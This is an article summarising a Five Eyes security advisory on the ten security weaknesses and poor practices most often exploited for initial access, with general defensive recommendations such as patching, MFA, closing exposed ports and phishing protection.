Based on the latest security advisory released by the Five Eyes Cybersecurity agencies in the U.K., U.S., Australia, Canada, and New Zealand, the most frequent attack vectors cyber threat actors use for preliminary access to systems are exploits of public-facing apps, external remote solutions, phishing, trusted relationships, and compromised credentials for legitimate user accounts.
The abovementioned attack methods usually do well because of inadequate security practices, poor cyber hygiene, poor controls, and weak security settings. The security advisory identifies the ten most often exploited controls and procedures by hackers as follows:
Not using software program updates and patching promptly
The inability to update the software immediately and use patches for identified vulnerabilities gives hackers the opportunity to exploit the vulnerabilities. Exploits for vulnerabilities are frequently released to the public in days or weeks. Attackers could exploit vulnerabilities to acquire access to sensitive data, perform denial-of-service attacks, or seize complete control of vulnerable networks. Slow patching is a very common poor security practice.
Open ports and wrong configurations that disclose services online
One more frequently identified vulnerability is the inability to shut open ports. Attackers constantly check for open ports and wrongly configured services that disclose systems online. Server Message Block (SMB), RDP, NetBIOS, and Telnet, which are high-risk services, if compromised can give attackers the initial access.
Inability to implement multifactor authentication
Multifactor authentication must be used on all accounts to stop efforts to utilize stolen credentials. This is particularly crucial for Remote Desktop Protocol, accounts with admin privileges, and other remote services. Not using multifactor authentication for RDP is frequently taken advantage of in ransomware attacks.
Usage of default credentials and settings
The inability to modify default credentials gives attackers quick access because default credentials are usually available in the public domain. Default settings are usually overly permissible to make sure they’re user-friendly, and the inability to alter settings can provide attackers a way for exploitation.
Inadequate remote access controls
Remote services are typically attacked by threat actors who take advantage of insufficient authentication controls, like no multifactor authentication. Besides using MFA, network defenders ought to look at using a boundary firewall before a VPN and IDS/IPS sensors to identify strange activity.
Improperly employed permissions or privileges, and errors in access control lists
Improperly applied permissions or privileges can keep access control regulations from being imposed, which can enable system processes or unauthorized end-users to be given access to objects.
Weak password guidelines
Various methods may be employed to take advantage of weak, leaked, or exposed passwords to gain access to victims’ networks. Guidelines ought to be set and imposed necessitating using strong, unique passwords. Weak RDP passwords are typically compromised.
Insecure cloud services
Wrong configurations and weak security settings can leave cloud services vulnerable, providing threat actors with quick access to sensitive information and allowing cryptojacking utilizing cloud servers.
Inadequate phishing protection
Phishing is a top-rated way that allows threat actors to obtain a footing in systems. Email security options ought to be utilized that have excellent antivirus controls, utilize behavioral analysis to recognize malware, and have the ability to check embedded links. Security recognition training ought to be routinely given to the employees.
Inadequate endpoint detection and response
Endpoint detection options ought to be put in place that go past signature-based detection techniques as threat actors frequently utilize obfuscated malicious scripts and PowerShell to circumvent endpoint security tools like an antivirus software program.